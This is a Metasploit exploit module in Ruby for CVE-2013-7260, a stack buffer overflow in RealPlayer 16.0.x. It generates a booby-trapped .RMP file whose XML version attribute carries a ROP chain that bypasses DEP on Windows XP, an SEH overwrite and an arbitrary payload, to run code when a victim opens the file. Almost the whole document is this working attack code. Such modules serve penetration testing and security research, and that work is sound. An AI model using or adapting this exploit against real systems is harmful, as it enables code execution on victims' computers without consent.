RealNetworks RealPlayer Version Attribute Buffer Overflow

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'RealNetworks RealPlayer Version Attribute Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack-based buffer overflow vulnerability in
        version 16.0.3.51 and 16.0.2.32 of RealNetworks RealPlayer, caused by
        improper bounds checking of the version and encoding attributes inside
        the XML declaration.

        By persuading the victim to open a specially-crafted .RMP file, a
        remote attacker could execute arbitrary code on the system or cause
        the application to crash.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Gabor Seljan' # Vulnerability discovery and Metasploit module
        ],
      'References'     =>
        [
          [ 'BID', '64695' ],
          [ 'EDB', '30468' ],
          [ 'OSVDB', '101356' ],
          [ 'CVE', '2013-7260' ],
          [ 'US-CERT-VU', '698278' ],
          [ 'URL', 'http://service.real.com/realplayer/security/12202013_player/en/' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars'   => "\x00\x22",
          'Space'      => 2396
        },
      'Targets'        =>
        [
          [ 'Windows XP SP2/SP3 (DEP Bypass) / RealPlayer 16.0.3.51/16.0.2.32',
            {
              'OffsetROP'  => 44,
              'OffsetMenu' => 11052,      # Open via File -> Open
              'Ret'        => 0x5acceecd  # ADD ESP,428 # RETN 10 [mswmdm.dll]
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2013-12-20',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('FILENAME', [ false, 'The file name.', 'msf.rmp'])
        ],
      self.class)

  end

  def exploit

    rop_nop =
    [
      0x77c1c552   # RETN (ROP NOP) [msvcrt.dll]
    ].flatten.pack('V*')

    rop_gadgets =
    [
      0x77c21d16,  # POP EAX # RETN [msvcrt.dll]
      0x77c11120,  # &VirtualProtect() [IAT msvcrt.dll]
      0x77c1bb36,  # POP EBP # RETN [msvcrt.dll]
      0x77c20497,  # skip 4 bytes [msvcrt.dll]
      0x77c2362c,  # POP EBX # RETN [msvcrt.dll]
      0x0000095c,  # 0x0000095C-> EBC
      0x5acb2caf,  # POP EDX # RETN [mswmdm.dll]
      0x00000040,  # 0x00000040-> EDX
      0x77c1f519,  # POP ECX # RETN [msvcrt.dll]
      0x77C5D305,  # &Writable location [msvcrt.dll]
      0x77c23b47,  # POP EDI # RETN [msvcrt.dll]
      0x77c47a42,  # RETN (ROP NOP) [msvcrt.dll]
      0x77c2ed13,  # POP ESI # RETN [msvcrt.dll]
      0x77c2aacc,  # JMP [EAX] [msvcrt.dll]
      0x77c12df9,  # PUSHAD # RETN [msvcrt.dll]
      0x77c35459   # PUSH ESP # RETN [msvcrt.dll]
    ].flatten.pack('V*')

    sploit =  rand_text_alpha_upper(target['OffsetROP'])
    sploit << rop_nop
    sploit << make_nops(16)
    sploit << rop_gadgets
    sploit << make_nops(16)
    sploit << payload.encoded
    sploit << generate_seh_record(target.ret) # Open via double click (2540)
    sploit << rand_text_alpha_upper(target['OffsetMenu'])
    sploit << generate_seh_record(target.ret) # Open via File -> Open (13600)
    sploit << rand_text_alpha_upper(17000) # Generate exception

    # Create the file
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create("<?xml version=\"" + sploit + "\"?>")

  end
end